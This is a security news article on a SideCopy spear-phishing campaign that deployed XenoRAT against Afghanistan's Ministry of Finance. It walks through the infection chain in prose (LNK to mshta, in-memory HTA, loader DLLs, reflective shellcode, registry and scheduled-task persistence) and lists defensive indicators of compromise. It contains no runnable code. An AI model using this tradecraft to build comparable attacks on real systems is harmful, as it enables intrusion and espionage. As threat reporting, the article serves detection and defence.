SideCopy Hackers Deploy Persistent XenoRAT Malware to Target Afghanistan Finance Ministry

A Pakistan-linked threat group known as SideCopy has launched a focused cyberattack against Afghanistan’s Ministry of Finance, deploying a persistent remote access tool called XenoRAT.

The campaign, dubbed Operation XENOFISCAL, targeted provincial finance officials across all 34 Afghan Mustoufiats — regional revenue and finance directorates that form the fiscal backbone of the country.

The attack began with a spear phishing email carrying a ZIP archive. Inside was a malicious shortcut file disguised with a PDF icon and a filename written in Pashto — the dominant language used by Afghan government workers.

The lure posed as a list of employees invited to a seminar on psychological and intellectual warfare, showing that the attackers had precise knowledge of their targets’ working environment.

Analysts from Seqrite, in a report shared with Cyber Security News, identified this campaign and attributed it to the SideCopy APT cluster with medium-to-high confidence.

SideCopy operates under the broader Transparent Tribe, also known as APT36, umbrella — a group with a documented history of targeting South Asian government institutions.

Seqrite Labs has been tracking this threat cluster for years as part of its global spear phishing monitoring program.

Once the victim opened the shortcut file, the malware silently used mshta.exe — a legitimate Windows utility — to reach out to a compromised Afghan education domain and pull a remote payload.

This technique is called Living-off-the-Land, where attackers abuse built-in system tools to avoid triggering security alerts. The malware then decoded obfuscated JavaScript in memory and embedded itself in the Windows Registry, disguising its persistence entry as a Microsoft Edge process.

The final stage deployed XenoRAT 1.8.7, an open-source Remote Access Trojan available on GitHub, which established an encrypted connection to a bulletproof server in Frankfurt, Germany.

This command-and-control infrastructure was entirely separate from the delivery domain — a deliberate design to ensure long-term access even if the delivery layer was discovered and shut down.

SideCopy Hackers Deploy Persistent XenoRAT Malware

The malware chain ran across five stages, each built to pass control to the next without triggering detection. After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af, a compromised Afghan education website.

That payload contained obfuscated JavaScript which decoded itself in memory and dropped a .NET-based loader DLL to continue the infection.

That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory.

The shellcode that followed used reflective loading — allocating executable memory and injecting itself without writing the main payload to disk. This fileless approach makes the malware far harder to catch with conventional antivirus scanning.

XenoRAT is a capable surveillance tool once active. It connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.

The malware runs a mutex called “clouda” to prevent duplicate instances, and it queries installed antivirus products before reporting back to its operators.

Persistence Mechanisms and Infrastructure Exposure

The decoy document dropped during execution was a real Afghan Ministry of Finance internal staff directory, listing Finance Directors, Revenue Chiefs, and Secretaries from all 34 provinces — complete with mobile numbers.

This level of detail indicates the attackers conducted prior intelligence gathering, likely through earlier compromises of Afghan government networks.

The delivery domain abimj.edu.af resolved to IPs 103.132.98.224 and 103.132.98.226, both on a subnet belonging to Afghanistan’s own Ministry of Communication.

Staging malicious payloads on local Afghan infrastructure allowed traffic to blend with legitimate government communications, bypassing network monitoring tools.

The RAT’s C2 server at 185.235.137.106 was hosted on AS59711, a Bulgaria-registered provider with Frankfurt data center presence previously linked to SideCopy activity.

Security teams should monitor for unusual mshta.exe executions, unexpected Registry Run keys mimicking Windows processes, and outbound traffic to unrecognized European hosting providers.

Enforcing application allow-listing, auditing scheduled tasks regularly, and restricting HTA execution from public directories are effective mitigations. Seqrite released detections under signatures including Link.Downloader.50744.GC and Script.Netloader.50745.GC to help identify compromised systems.

Indicators of Compromise (IoCs):-

Type	Indicator	Description
SHA256	194B912C242604D6F9A79369F22338C58A13CE0CC2ED280CE505075808BC2F14	ZIP archive (initial delivery)
SHA256	3B4194BDFE40D94031A94B30397FFD8A4B09D0A4057668E897B8BDCD1703DD01	Malicious LNK file
SHA256	DF9173A28C0B0B878C10A53D35CD7CE6F6ED66D207B6B7C4FF723721F1C027AB	Decoy PDF document
SHA256	A63E90EE57A1F213A8FE76EF1A6CFF5AE9ED7EBCEDA258431533825E648C0C67	ugayt.hta payload
SHA256	5833917BD137804F5A021D2CB37ADFE5C4B7B67DBB06D59C3B9C5CF393835E45	noway.bat (persistence batch file)
SHA256	99127C8C67D90E2776BEEB85281F9C68399BF4567B07A6B638D68B760212E88D	zuidrt.hta (Stage-2 HTA payload)
SHA256	8F2D979EF33B2900351C94C7335275A9342C75189E1A901998E90A539E944A1A	WayBroad.dll (Stage-1 Loader DLL)
SHA256	0019212F25EB04BBB33BB194879C095265DB7855D6003BDD777CF0CBB90EB772	Aotestpass.dll (Stage-2 Loader DLL)
SHA256	9AE3D785486022AF82EA92E51B26E3F55C1BBA88A7BE2AD9790F4240E8499D14	XenoRAT final payload
IP Address	185.235.137.106	XenoRAT C2 server (HZ Hosting, Frankfurt)
IP Address	103.132.98.224	Delivery domain resolved IP (Afghan MoCIT)
IP Address	103.132.98.226	Delivery domain resolved IP (Afghan MoCIT)
Domain	abimj.edu.af	Compromised Afghan education domain used for payload delivery
URL	hxxp://abimj.edu.af/index.php	Stage-1 remote HTA/PHP payload endpoint
URL	hxxp://abimj.edu.af/institute/cloudiyaf/document.pdf	Decoy PDF download URL
URL	hxxps://abimj.edu.af/institute/10/	Stage-2 payload download URL
URL	hxxps://abimj.edu.af/institute/7/	Alternate Stage-2 URL (Windows 7 targets)
File Name	zuidrt.hta	Persistent HTA payload stored in Public folder
File Name	noway.bat	Hidden batch file for registry persistence execution
File Name	ayui.vmxx	Disguised encoded Stage-2 payload blob
File Name	ayhui.vmxx	Reconstructed intermediate shellcode container
Registry Key	HKCUSoftwareMicrosoftWindowsCurrentVersionRun “Edgre”	Persistence Run key masquerading as Microsoft Edge
Mutex	clouda	XenoRAT single-instance mutex
Scheduled Task	XenoUpdateManager	Persistence scheduled task created by XenoRAT

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.